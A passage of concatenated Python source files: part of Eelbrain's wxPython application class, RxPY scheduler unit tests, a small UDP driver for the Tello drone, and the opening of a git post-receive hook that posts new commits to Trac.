        t.Bind(wx.EVT_MENU, self.OnCut, id=wx.ID_CUT)
        t.Bind(wx.EVT_MENU, t.OnDrawCrosshairs, id=ID.DRAW_CROSSHAIRS)
        t.Bind(wx.EVT_MENU, self.OnOnlineHelp, id=ID.HELP_EELBRAIN)
        t.Bind(wx.EVT_MENU, self.OnOnlineHelp, id=ID.HELP_PYTHON)
        t.Bind(wx.EVT_MENU, self.OnPaste, id=wx.ID_PASTE)
        t.Bind(wx.EVT_MENU, t.OnRedo, id=ID.REDO)
        t.Bind(wx.EVT_MENU, t.OnSave, id=wx.ID_SAVE)
        t.Bind(wx.EVT_MENU, t.OnSaveAs, id=wx.ID_SAVEAS)
        t.Bind(wx.EVT_MENU, t.OnSetLayout, id=ID.SET_LAYOUT)
        t.Bind(wx.EVT_MENU, t.OnSetMarkedChannels, id=ID.SET_MARKED_CHANNELS)
        t.Bind(wx.EVT_MENU, t.OnSetVLim, id=ID.SET_VLIM)
        t.Bind(wx.EVT_MENU, t.OnSetTime, id=ID.TIME)
        t.Bind(wx.EVT_MENU, self.OnLinkTimeAxes, id=ID.LINK_TIME_AXES)
        t.Bind(wx.EVT_MENU, t.OnUndo, id=ID.UNDO)
        t.Bind(wx.EVT_MENU, t.OnWindowIconize, id=ID.WINDOW_MINIMIZE)
        t.Bind(wx.EVT_MENU, self.OnWindowTile, id=ID.WINDOW_TILE)
        t.Bind(wx.EVT_MENU, t.OnWindowZoom, id=ID.WINDOW_ZOOM)
        t.Bind(wx.EVT_MENU, t.OnSetWindowTitle, id=ID.SET_TITLE)
        t.Bind(wx.EVT_MENU, self.OnQuit, id=wx.ID_EXIT)
        t.Bind(wx.EVT_MENU, self.OnYieldToTerminal, id=ID.YIELD_TO_TERMINAL)

        # UI-update concerning frames
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIBackward, id=wx.ID_BACKWARD)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIClear, id=wx.ID_CLEAR)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIClose, id=wx.ID_CLOSE)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIDown, id=wx.ID_DOWN)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIDrawCrosshairs, id=ID.DRAW_CROSSHAIRS)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIForward, id=wx.ID_FORWARD)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIOpen, id=wx.ID_OPEN)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIRedo, id=ID.REDO)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUISave, id=wx.ID_SAVE)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUISaveAs, id=wx.ID_SAVEAS)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUISetLayout, id=ID.SET_LAYOUT)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUISetMarkedChannels, id=ID.SET_MARKED_CHANNELS)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUISetVLim, id=ID.SET_VLIM)
        t.Bind(wx.EVT_UPDATE_UI, self.OnUpdateUILinkTimeAxes, id=ID.LINK_TIME_AXES)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUISetTime, id=ID.TIME)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUITools, id=ID.TOOLS)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIUndo, id=ID.UNDO)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIUp, id=wx.ID_UP)

        # UI-update concerning focus
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIFocus, id=wx.ID_COPY)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIFocus, id=ID.COPY_AS_PNG)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIFocus, id=wx.ID_CUT)
        t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIFocus, id=wx.ID_PASTE)

        return menu_bar

    def _pt_thread_win(self, context):
        """Windows watcher thread: busy-wait for terminal input, then exit loop."""
        # On Windows, select.poll() is not available
        while context._input_is_ready is None or not context.input_is_ready():
            sleep(0.020)
        wx.CallAfter(self.ExitMainLoop, True)

    def _pt_thread_linux(self, context):
        """POSIX watcher thread: poll the inputhook fd, then exit the main loop."""
        # getLogger('Eelbrain').debug("PTK: poll")
        poll = select.poll()
        poll.register(context.fileno(), select.POLLIN)
        poll.poll(-1)
        wx.CallAfter(self.ExitMainLoop, True)

    def pt_inputhook(self, context):
        """prompt_toolkit inputhook"""
        # prompt_toolkit.eventloop.inputhook.InputHookContext
        Thread(target=self._pt_thread, args=(context,)).start()
        self.MainLoop()

    def jumpstart(self):
        """Run the main loop briefly to let wx initialize the GUI backend."""
        wx.CallLater(JUMPSTART_TIME, self.ExitMainLoop)
        self.MainLoop()

    def _get_active_frame(self):
        """Return the frame that currently has focus, or the active window."""
        win = wx.Window.FindFocus()
        win_parent = wx.GetTopLevelParent(win)
        if win_parent:
            return win_parent
        for w in wx.GetTopLevelWindows():
            if hasattr(w, 'IsActive') and w.IsActive():
                return w
        return wx.GetActiveWindow()

    def _get_parent_gui(self):
        """Walk up from the active frame to the nearest GUI frame with a Tools menu."""
        frame = self._get_active_frame()
        if frame is None:
            return
        while True:
            if hasattr(frame, 'MakeToolsMenu'):
                return frame
            elif frame.Parent is not None:
                frame = frame.Parent
            else:
                return

    def _bash_ui(self, func, *args):
        "Launch a modal dialog based on terminal input"
        # Create fake frame to prevent dialog from sticking
        if not self.GetTopWindow():
            self.SetTopWindow(wx.Frame(None))

        # Run dialog
        self._bash_ui_from_mainloop = self.using_prompt_toolkit or self.IsMainLoopRunning()
        if self._bash_ui_from_mainloop:
            return func(*args)
        else:
            # without a running loop, schedule the dialog and run the loop
            # until _bash_ui_finalize exits it and stores the result
            wx.CallAfter(func, *args)
            print("Please switch to the Python Application to provide input.")
            self.MainLoop()
            return self._result

    def _bash_ui_finalize(self, result):
        """Hand back a dialog result, exiting the temporary main loop if needed."""
        if self._bash_ui_from_mainloop:
            self.Yield()
            return result
        else:
            self._result = result
            self.ExitMainLoop()

    def ask_for_dir(self, title="Select Folder", message="Please Pick a Folder",
                    must_exist=True):
        """Modal directory picker; returns the path or False on cancel."""
        return self._bash_ui(self._ask_for_dir, title, message, must_exist)

    def _ask_for_dir(self, title, message, must_exist):
        # NOTE(review): FD_SAVE/FD_OVERWRITE_PROMPT are FileDialog flags used
        # on a DirDialog here — confirm intended (DD_DEFAULT_STYLE expected)
        style = wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT
        if must_exist:
            style = style | wx.DD_DIR_MUST_EXIST
        dialog = wx.DirDialog(None, message, name=title,
                              style=style)
        dialog.SetTitle(title)
        if dialog.ShowModal() == wx.ID_OK:
            result = dialog.GetPath()
        else:
            result = False
        dialog.Destroy()
        return self._bash_ui_finalize(result)

    def ask_for_file(self, title, message, filetypes, directory, mult):
        """Modal file-open dialog; returns path(s) or False on cancel."""
        return self._bash_ui(self._ask_for_file, title, message, filetypes, directory, mult)

    def _ask_for_file(self, title, message, filetypes, directory, mult):
        """Return path(s) or False.

        Parameters
        ----------
        ...
        directory : str
            Path to initial directory.

        Returns
        -------
        result : list | str | None
            Paths(s) or False.
        """
        style = wx.FD_OPEN
        if mult:
            style = style | wx.FD_MULTIPLE
        dialog = wx.FileDialog(None, message, directory, wildcard=wildcard(filetypes), style=style)
        dialog.SetTitle(title)
        if dialog.ShowModal() == wx.ID_OK:
            if mult:
                result = dialog.GetPaths()
            else:
                result = dialog.GetPath()
        else:
            result = False
        dialog.Destroy()
        return self._bash_ui_finalize(result)

    def ask_for_string(self, title, message, default='', parent=None):
        """Modal text entry dialog; returns the string or False on cancel."""
        return self._bash_ui(self._ask_for_string, title, message, default, parent)

    def _ask_for_string(self, title, message, default, parent):
        dialog = wx.TextEntryDialog(parent, message, title, default)
        if dialog.ShowModal() == wx.ID_OK:
            result = dialog.GetValue()
        else:
            result = False
        dialog.Destroy()
        return self._bash_ui_finalize(result)

    def ask_saveas(self, title, message, filetypes, defaultDir, defaultFile):
        """Modal save-as dialog; returns the path or False on cancel."""
        return self._bash_ui(self._ask_saveas, title, message, filetypes, defaultDir, defaultFile)

    def _ask_saveas(self, title, message, filetypes, defaultDir, defaultFile):
        # setup file-dialog
        dialog = wx.FileDialog(None, message, wildcard=wildcard(filetypes), style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
        dialog.SetTitle(title)
        if defaultDir:
            dialog.SetDirectory(defaultDir)
        if defaultFile:
            dialog.SetFilename(defaultFile)
        # get result
        if dialog.ShowModal() == wx.ID_OK:
            result = dialog.GetPath()
        else:
            result = False
        dialog.Destroy()
        return self._bash_ui_finalize(result)

    def message_box(self, message, caption, style, parent=None):
        """Modal message box; returns the wx button id the user pressed."""
        return self._bash_ui(self._message_box, message, caption, style, parent)

    def _message_box(self, message, caption, style, parent):
        dialog = wx.MessageDialog(parent, message, caption, style)
        result = dialog.ShowModal()
        dialog.Destroy()
        return self._bash_ui_finalize(result)

    def ExitMainLoop(self, event_with_pt=True):
        if event_with_pt or not self.using_prompt_toolkit:
            # with prompt-toolkit, this leads to hanging when terminating the
            # interpreter
            wx.App.ExitMainLoop(self)

    def Attach(self, obj, desc, default_name, parent):
        """Expose *obj* as a variable in the IPython user namespace."""
        if self._ipython is None:
            self.message_box("Attach Unavailable", "The attach command requires running from within IPython 5 or later", wx.ICON_ERROR | wx.OK, parent)
            return
        name = self.ask_for_string("Attach", f"Variable name for {desc} in terminal:", default_name, parent)
        if name:
            self._ipython.user_global_ns[name] = obj

    def OnAbout(self, event):
        """Show (and raise) the About window, creating it on first use."""
        if not self.about_frame:
            self.about_frame = AboutFrame(None)
        self.about_frame.Show()
        self.about_frame.Raise()

    def OnClear(self, event):
        frame = self._get_active_frame()
        frame.OnClear(event)

    def OnCopy(self, event):
        # prefer the focused widget; fall back to the active frame
        win = wx.Window.FindFocus()
        if hasattr(win, 'CanCopy'):
            return win.Copy()
        win = self._get_active_frame()
        if hasattr(win, 'CanCopy'):
            return win.Copy()
        getLogger('Eelbrain').debug("App.OnCopy() call but neither focus nor frame have CanCopy()")
        event.Skip()

    def OnCopyAsPNG(self, event):
        wx.Window.FindFocus().CopyAsPNG()

    def OnCut(self, event):
        win = wx.Window.FindFocus()
        win.Cut()

    def OnDrawCrosshairs(self, event):
        frame = self._get_active_frame()
        frame.OnDrawCrosshairs(event)

    def OnLinkTimeAxes(self, event):
        """Link the time axis of all open figures with a uniform time dimension."""
        from ..plot._base import TimeSlicer
        from .._data_obj import UTS

        figures = []
        for window in wx.GetTopLevelWindows():
            eelfigure = getattr(window, '_eelfigure', None)
            if eelfigure and isinstance(eelfigure, TimeSlicer) and isinstance(eelfigure._time_dim, UTS):
                figures.append(eelfigure)

        if len(figures) >= 2:
            f0 = figures[0]
            for figure in figures[1:]:
                f0.link_time_axis(figure)

    def OnMenuOpened(self, event):
        "Update the window-specific Tools menu"
        menu = event.GetMenu()
        if menu.GetTitle() == 'Tools':
            for item in menu.GetMenuItems():
                menu.Remove(item)
            frame = self._get_parent_gui()
            if frame:
                frame.MakeToolsMenu(menu)

    def OnOnlineHelp(self, event):
        "Called from the Help menu to open external resources"
        Id = event.GetId()
        if Id == ID.HELP_EELBRAIN:
            webbrowser.open("https://pythonhosted.org/eelbrain/")
        elif Id == ID.HELP_PYTHON:
            webbrowser.open("http://docs.python.org/2.7/")
        else:
            raise RuntimeError("Invalid help ID")

    def OnOpen(self, event):
        frame = self._get_active_frame()
        frame.OnOpen(event)

    def OnPaste(self, event):
        win = wx.Window.FindFocus()
        win.Paste()

    def OnQuit(self, event):
        """Close all windows; abort if any window refuses to close."""
        getLogger('Eelbrain').debug("App.OnQuit()")
        for win in wx.GetTopLevelWindows():
            if not win.Close():
                return
        getLogger('Eelbrain').debug("App.ExitMainLoop()")
        self.ExitMainLoop()

    def OnRedo(self, event):
        frame = self._get_active_frame()
        frame.OnRedo(event)

    def OnSave(self, event):
        frame = self._get_active_frame()
        frame.OnSave(event)

    def OnSaveAs(self, event):
        frame = self._get_active_frame()
        frame.OnSaveAs(event)

    def OnSetVLim(self, event):
        frame = self._get_active_frame()
        frame.OnSetVLim(event)

    def OnSetLayout(self, event):
        frame = self._get_active_frame()
        frame.OnSetLayout(event)

    def OnSetMarkedChannels(self, event):
        frame = self._get_active_frame()
        frame.OnSetMarkedChannels(event)

    def OnSetTime(self, event):
        frame = self._get_active_frame()
        frame.OnSetTime(event)

    def OnSetWindowTitle(self, event):
        frame = self._get_active_frame()
        frame.OnSetWindowTitle(event)

    def OnUndo(self, event):
        frame = self._get_active_frame()
        frame.OnUndo(event)

    # UI-update handlers: delegate to the active frame when it implements the
    # corresponding handler; otherwise disable the menu item

    def OnUpdateUIBackward(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUIBackward'):
            frame.OnUpdateUIBackward(event)
        else:
            event.Enable(False)

    def OnUpdateUIClear(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUIClear'):
            frame.OnUpdateUIClear(event)
        else:
            event.Enable(False)

    def OnUpdateUIClose(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUIClose'):
            frame.OnUpdateUIClose(event)
        else:
            event.Enable(False)

    def OnUpdateUIDown(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUIDown'):
            frame.OnUpdateUIDown(event)
        else:
            event.Enable(False)

    def OnUpdateUIDrawCrosshairs(self, event):
        frame = self._get_active_frame()
        if isinstance(frame, EelbrainFrame):
            frame.OnUpdateUIDrawCrosshairs(event)
        else:
            event.Enable(False)
            event.Check(False)

    def OnUpdateUIForward(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUIForward'):
            frame.OnUpdateUIForward(event)
        else:
            event.Enable(False)

    def OnUpdateUIFocus(self, event):
        """Enable focus-dependent items (copy/cut/paste) via their Can* methods."""
        func_name = FOCUS_UI_UPDATE_FUNC_NAMES[event.GetId()]
        win = wx.Window.FindFocus()
        func = getattr(win, func_name, None)
        if func is None:
            win = self._get_active_frame()
            func = getattr(win, func_name, None)
            if func is None:
                event.Enable(False)
                return
        event.Enable(func())

    def OnUpdateUILinkTimeAxes(self, event):
        """Enable only when at least two linkable figures are open."""
        n = 0
        for window in wx.GetTopLevelWindows():
            eelfigure = getattr(window, '_eelfigure', None)
            if eelfigure:
                n += hasattr(eelfigure, 'link_time_axis')
                if n >= 2:
                    event.Enable(True)
                    return
        event.Enable(False)

    def OnUpdateUIOpen(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUIOpen'):
            frame.OnUpdateUIOpen(event)
        else:
            event.Enable(False)

    def OnUpdateUIRedo(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUIRedo'):
            frame.OnUpdateUIRedo(event)
        else:
            event.Enable(False)

    def OnUpdateUISave(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUISave'):
            frame.OnUpdateUISave(event)
        else:
            event.Enable(False)

    def OnUpdateUISaveAs(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUISaveAs'):
            frame.OnUpdateUISaveAs(event)
        else:
            event.Enable(False)

    def OnUpdateUISetLayout(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUISetLayout'):
            frame.OnUpdateUISetLayout(event)
        else:
            event.Enable(False)

    def OnUpdateUISetMarkedChannels(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUISetMarkedChannels'):
            frame.OnUpdateUISetMarkedChannels(event)
        else:
            event.Enable(False)

    def OnUpdateUISetVLim(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUISetVLim'):
            frame.OnUpdateUISetVLim(event)
        else:
            event.Enable(False)

    def OnUpdateUISetTime(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUISetTime'):
            frame.OnUpdateUISetTime(event)
        else:
            event.Enable(False)

    def OnUpdateUISetWindowTitle(self, event):
        frame = self._get_active_frame()
        event.Enable(getattr(frame, '_allow_user_set_title', False))

    def OnUpdateUITools(self, event):
        # FIX: call _get_parent_gui(); the bound method object itself is
        # always truthy, so the Tools menu was previously always enabled
        event.Enable(bool(self._get_parent_gui()))

    def OnUpdateUIUndo(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUIUndo'):
            frame.OnUpdateUIUndo(event)
        else:
            event.Enable(False)

    def OnUpdateUIUp(self, event):
        frame = self._get_active_frame()
        if frame and hasattr(frame, 'OnUpdateUIUp'):
            frame.OnUpdateUIUp(event)
        else:
            event.Enable(False)

    def OnWindowClose(self, event):
        frame = self._get_active_frame()
        if frame:
            frame.Close()

    def OnWindowIconize(self, event):
        frame = self._get_active_frame()
        if frame:
            frame.Iconize()

    def OnWindowRaise(self, event):
        id_ = event.GetId()
        window = wx.FindWindowById(id_)
        window.Raise()

    def OnWindowTile(self, event):
        """Arrange all top-level windows left-to-right, wrapping into rows."""
        frames = sorted(wx.GetTopLevelWindows(), key=lambda x: x.Position[0])
        dx, dy = wx.DisplaySize()
        x = 0
        y = 0
        y_next = 0
        for frame in frames:
            sx, sy = frame.Size
            if x and x + sx > dx:
                # row is full: wrap to the next row (or stop if off-screen)
                if y_next > dy:
                    return
                x = 0
                y = y_next
            frame.Position = (x, y)
            y_next = max(y_next, y + sy)
            x += sx

    def OnWindowZoom(self, event):
        frame = self._get_active_frame()
        if frame:
            frame.Maximize()

    def OnYieldToTerminal(self, event):
        self.ExitMainLoop()
def get_app(jumpstart=False):
    """Return the global :class:`App` instance, creating it on first use.

    Parameters
    ----------
    jumpstart : bool
        On macOS, briefly run the main loop after creating the app to give wx
        a chance to initialize the GUI backend.
    """
    global APP
    if APP is None:
        try:
            APP = App()
        except SystemExit as exc:
            # FIX: SystemExit.code may be None or an int (an exit status);
            # only a string code can carry wx's "needs access to the screen"
            # message, so guard before calling .startswith()
            if isinstance(exc.code, str) and exc.code.startswith("This program needs access to the screen"):
                raise SystemExit(
                    f"{exc.code} \n\n"
                    f"If you are using an iPython terminal: make sure you are "
                    f"running a framework build by launching IPython with:\n\n"
                    f"  $ eelbrain\n\n"
                    f"If you are using a Jupyter notebook, prefix the notebook with\n\n"
                    f"  %matplotlib inline\n\n"
                    f"and restart the kernel.")
            else:
                raise
        if jumpstart and IS_OSX:
            # Give wx a chance to initialize the GUI backend
            APP.OnAbout(None)
            wx.CallLater(JUMPSTART_TIME, APP.about_frame.Close)
            wx.CallLater(JUMPSTART_TIME, APP.ExitMainLoop)
            APP.MainLoop()
    return APP
def needs_jumpstart():
    """Whether the GUI backend still needs a jumpstart (macOS before app creation)."""
    if not IS_OSX:
        return False
    return APP is None
def run(block=False):
    """Hand over command to the GUI (quit the GUI to return to the terminal)

    Parameters
    ----------
    block : bool
        Block the Terminal even if the GUI is capable of being run in parallel.
        Control returns to the Terminal when the user quits the GUI application.
        This is also useful to prevent plots from closing at the end of a
        script.
    """
    app = get_app()
    if app.using_prompt_toolkit:
        # prompt_toolkit already runs the wx loop alongside the terminal;
        # only block when explicitly requested
        if block:
            app.MainLoop()
    else:
        if not app.IsMainLoopRunning():
            print("Starting GUI. Quit the Python application to return to the "
                  "shell...")
            app.MainLoop()
class DockIcon(TaskBarIcon):
    """macOS dock icon with an optional popup menu."""
    # http://stackoverflow.com/a/38249390/166700

    def __init__(self, app):
        super(DockIcon, self).__init__(iconType=TBI_DOCK)
        self.app = app
        # Set the image
        self.SetIcon(Icon('eelbrain256', True), "Eelbrain")
        self.imgidx = 1

    def CreatePopupMenu(self):
        """Offer 'Yield to Terminal' only when not running under prompt_toolkit."""
        if self.app.using_prompt_toolkit:
            return None
        menu = wx.Menu()
        menu.Append(ID.YIELD_TO_TERMINAL, '&Yield to Terminal')
        return menu
|
test_asynciothreadsafescheduler.py | import unittest
import asyncio
import threading
from datetime import datetime, timedelta
from rx.scheduler.eventloop import AsyncIOThreadSafeScheduler
class TestAsyncIOThreadSafeScheduler(unittest.TestCase):
    """Tests for AsyncIOThreadSafeScheduler (scheduling from foreign threads)."""

    def test_asyncio_threadsafe_schedule_now(self):
        """scheduler.now mirrors the event loop's clock."""
        loop = asyncio.get_event_loop()
        scheduler = AsyncIOThreadSafeScheduler(loop)
        diff = scheduler.now - datetime.utcfromtimestamp(loop.time())
        assert abs(diff) < timedelta(milliseconds=1)

    def test_asyncio_threadsafe_schedule_now_units(self):
        """scheduler.now advances in real-time units.

        FIX: this test previously used ``yield from`` directly in the test
        method, turning it into a generator function — unittest never executed
        its body, so the test silently passed without running. The sleep is
        now wrapped in a coroutine driven to completion by the loop.
        """
        loop = asyncio.get_event_loop()
        scheduler = AsyncIOThreadSafeScheduler(loop)
        diff = scheduler.now

        @asyncio.coroutine
        def go():
            yield from asyncio.sleep(0.1)

        loop.run_until_complete(go())
        diff = scheduler.now - diff
        assert timedelta(milliseconds=80) < diff < timedelta(milliseconds=180)

    def test_asyncio_threadsafe_schedule_action(self):
        """An action scheduled from another thread runs on the loop."""
        loop = asyncio.get_event_loop()

        @asyncio.coroutine
        def go():
            scheduler = AsyncIOThreadSafeScheduler(loop)
            ran = False

            def action(scheduler, state):
                nonlocal ran
                ran = True

            def schedule():
                scheduler.schedule(action)

            threading.Thread(target=schedule).start()
            yield from asyncio.sleep(0.1)
            assert ran is True

        loop.run_until_complete(go())

    def test_asyncio_threadsafe_schedule_action_due(self):
        """schedule_relative honors its due time when invoked from a thread."""
        loop = asyncio.get_event_loop()

        @asyncio.coroutine
        def go():
            scheduler = AsyncIOThreadSafeScheduler(loop)
            starttime = loop.time()
            endtime = None

            def action(scheduler, state):
                nonlocal endtime
                endtime = loop.time()

            def schedule():
                scheduler.schedule_relative(0.2, action)

            threading.Thread(target=schedule).start()
            yield from asyncio.sleep(0.3)
            assert endtime is not None
            diff = endtime - starttime
            assert diff > 0.18

        loop.run_until_complete(go())

    def test_asyncio_threadsafe_schedule_action_cancel(self):
        """A disposed relative schedule never runs its action."""
        loop = asyncio.get_event_loop()

        @asyncio.coroutine
        def go():
            ran = False
            scheduler = AsyncIOThreadSafeScheduler(loop)

            def action(scheduler, state):
                nonlocal ran
                ran = True

            def schedule():
                d = scheduler.schedule_relative(0.05, action)
                d.dispose()

            threading.Thread(target=schedule).start()
            yield from asyncio.sleep(0.3)
            assert ran is False

        loop.run_until_complete(go())

    def cancel_same_thread_common(self, test_body):
        """Driver for dispose-on-the-scheduler-thread scenarios.

        Runs *test_body* on a fresh loop in a daemon thread, then asserts
        dispose completed and the action never ran.
        """
        update_state = {
            'ran': False,
            'dispose_completed': False
        }

        def action(scheduler, state):
            update_state['ran'] = True

        # Make the actual test body run in daemon thread, so that in case of
        # failure it doesn't hang indefinitely.
        def thread_target():
            loop = asyncio.new_event_loop()
            scheduler = AsyncIOThreadSafeScheduler(loop)
            test_body(scheduler, action, update_state)

            @asyncio.coroutine
            def go():
                yield from asyncio.sleep(0.2)

            loop.run_until_complete(go())

        thread = threading.Thread(target=thread_target)
        thread.daemon = True
        thread.start()
        thread.join(0.3)
        assert update_state['dispose_completed'] is True
        assert update_state['ran'] is False

    def test_asyncio_threadsafe_cancel_non_relative_same_thread(self):
        def test_body(scheduler, action, update_state):
            d = scheduler.schedule(action)
            # Test case when dispose is called on thread on which loop is not
            # yet running, and non-relative schedule is used.
            d.dispose()
            update_state['dispose_completed'] = True

        self.cancel_same_thread_common(test_body)

    def test_asyncio_threadsafe_schedule_action_cancel_same_thread(self):
        def test_body(scheduler, action, update_state):
            d = scheduler.schedule_relative(0.05, action)
            # Test case when dispose is called on thread on which loop is not
            # yet running, and relative schedule is used.
            d.dispose()
            update_state['dispose_completed'] = True

        self.cancel_same_thread_common(test_body)

    def test_asyncio_threadsafe_schedule_action_cancel_same_loop(self):
        def test_body(scheduler, action, update_state):
            d = scheduler.schedule_relative(0.1, action)

            def do_dispose():
                d.dispose()
                update_state['dispose_completed'] = True

            # Test case when dispose is called in loop's callback.
            scheduler._loop.call_soon(do_dispose)

        self.cancel_same_thread_common(test_body)
|
TelloDriver.py | #!/usr/bin/env python2
import socket
import struct
import threading
import time
class TelloDriver:
    """Minimal UDP driver for the Ryze/DJI Tello drone (binary protocol).

    NOTE(review): written for Python 2 (see shebang) -- the bytearray(str)
    packet literals and str.find() on recv() data would need explicit
    encoding/bytes handling under Python 3.
    """

    def __init__(self, tello_ip='192.168.10.1', tello_port=8889):
        """Connect to the drone and block until the connection is acked."""
        # Initialize state
        self.alive = False  # Set to False to terminate listeners
        self.state = 0  # enum; 0=connecting, 1=connected
        self.udp = None
        self.listener_thread = None
        # Connect to UDP server
        tello_addr = (tello_ip, tello_port)
        self.udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.udp.connect(tello_addr)
        self.alive = True
        self.state = 0
        # Setup UDP listener loop
        self.listener_thread = threading.Thread(target=self._listener_loop)
        self.listener_thread.start()
        # Issue connection request
        self._send_conn_req()
        # Busy-wait (with tiny sleeps) for the listener thread to see the ack.
        while self.state == 0:
            time.sleep(0.001)
        print('Connected to Tello drone')

    def _listener_loop(self):
        """Receive packets until disconnected; dispatch them to parse_packet."""
        while self.alive:
            data = self.udp.recv(2048)
            if not data:
                print('! Got empty from recv: %s' % str(data))
                self.alive = False
                break
            if self.state == 0:
                # Still connecting: only look for the connection ack.
                if data.find('conn_ack:') == 0:
                    self.state = 1
                continue
            self.parse_packet(data)

    def parse_packet(self, data):
        """Decode one binary packet.

        The command id is a little-endian short at bytes 5:7.

        BUG FIX: the original if/elif chain had empty bodies (a SyntaxError)
        and listed cmd 26 twice; known command ids are kept as documented
        placeholders until real parsing is implemented.
        """
        if len(data) < 7:
            return  # raise ValueError('Packet too short')
        cmd = struct.unpack('<h', data[5:7])[0]
        if cmd == 86:  # telemetry; state presumably starts at 9th byte -- TODO parse
            pass
        elif cmd == 26:  # wifi strength
            pass
        elif cmd == 53:  # light strength
            pass
        print('R> %4d, cmd=%d' % (len(data), cmd))
        # Observed packet sizes:
        # R > 35, cmd = 86
        # R > 13, cmd = 26
        # R > 12, cmd = 53
        # R > 270, cmd = 4176

    def _send_conn_req(self):
        # Handshake packet; the trailing two bytes are magic values from a
        # protocol capture -- meaning unverified.
        packet = bytearray('conn_req:\x96\x17')
        self.udp.send(packet)

    def disconnect(self):
        """Stop the listener thread and close the socket (idempotent)."""
        self.alive = False
        if self.listener_thread is not None:
            self.listener_thread.join()
            self.listener_thread = None
        if self.udp is not None:
            self.udp.close()
            self.udp = None

    def takeoff(self):
        """Send the takeoff command (no-op when not connected)."""
        if not self.alive:
            return
        packet = bytearray('\xcc\x58\x00\x7c\x68\x54\x00\xe4\x01\xc2\x16')
        self.udp.send(packet)

    def throw_takeoff(self):
        """Send the throw-and-go takeoff command (no-op when not connected)."""
        if not self.alive:
            return
        packet = bytearray('\xcc\x58\x00\x7c\x48\x5d\x00\xe4\x01\xc2\x16')
        self.udp.send(packet)

    def land(self):
        """Send the land command (no-op when not connected)."""
        if not self.alive:
            return
        packet = bytearray('\xcc\x60\x00\x27\x68\x55\x00\xe5\x01\x00\xba\xc7')
        packet[9] = 0x00  # what is this flag?
        self.udp.send(packet)
if __name__ == '__main__':
    tello = None
    try:
        tello = TelloDriver()
        '''
        print('Take off')
        tello.takeoff()
        time.sleep(2.0)
        print('Land')
        tello.land()
        time.sleep(1.0)
        '''
        input('Press key to terminate')
        # tello.disconnect()
    finally:
        # BUG FIX: if TelloDriver() itself raised, tello is still None and
        # the unconditional tello.disconnect() masked the real error with
        # an AttributeError.
        if tello is not None:
            tello.disconnect()
|
git_post_receive.py | #!/usr/bin/env python
#
# This script is run after receive-pack has accepted a pack and the
# repository has been updated. It is passed arguments in through stdin
# in the form
# <oldrev> <newrev> <refname>
# For example:
# aa453216d1b3e49e7f6f98441fa56946ddcd6a20 68f7abf4e6f922807889f52bc043ecd31b79f814 refs/heads/master
# GOAL: Prevent patches that have appeared in one branch from
# reposting to trac when they are moved to another branch
# (this was causing duplicate comments / time from topic branches
# being merged into main
# This specific script will query the repository trying to isolate what
# in this receive is a new commit that the repository has not yet
# seen. It does this by a big call to git rev-parse, including revs
# that are now reachable, excluding everything else (tags, heads,
# oldrevs).
# http://www.kernel.org/pub/software/scm/git/docs/git-rev-list.html
# Once it has isolated what is new it posts those to trac.
import os, os.path, sys,logging, getpass, optparse, re
import subprocess, threading, time, errno
from optparse import OptionParser
from subprocess import PIPE
# Path of the trac post-commit helper script invoked once per new commit.
TRAC_POST_COMMIT = "/home/ACCELERATION/russ/trac-dev/TandE/trac0.12/scripts/trac-post-commit.py"
# Directory for per-repository hook logs (overridable via $LOGDIR).
logdir = os.getenv("LOGDIR") or "/var/log/commit-hooks"
# Module logger; handlers are attached in the __main__ section below.
log = logging.getLogger('gpr')
## Fn to easy working with remote processes
def capturedCall(cmd, **kwargs):
    """Run *cmd* like subprocess.call, but log stderr/stdout where
    appropriate (see capturedPopen); return the exit code."""
    proc = capturedPopen(cmd, **kwargs)
    exit_code = proc.wait()
    # Cheap attempt to let the stdout/stderr monitor threads get scheduled
    # (twice) and hopefully finish draining before we return.
    time.sleep(0.01)
    time.sleep(0.01)
    return exit_code
#be warned, if you see your pipelines hanging:
#http://old.nabble.com/subprocess.Popen-pipeline-bug--td16026600.html
#close_fds=True
## Fn to easy working with remote processes
def capturedPopen(cmd, stdin=None, stdout=None, stderr=None,
